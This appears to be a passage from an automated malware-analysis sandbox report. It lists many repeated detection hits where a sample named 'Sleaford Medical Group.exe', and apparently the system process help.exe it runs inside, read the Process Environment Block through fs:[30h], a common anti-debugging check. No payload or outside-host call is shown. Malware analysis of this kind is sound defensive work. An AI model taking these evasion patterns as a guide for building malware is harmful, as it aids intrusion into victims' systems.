      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E424257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E395210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E465BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E461074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E452073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E464015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E464015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3958EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4241E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4169A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056661B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00566601 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056662E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563282 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056532B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00565BDE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03895BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03804A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03804A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03854257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03843884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03843884 mov eax, dword ptr fs:[00000030h]
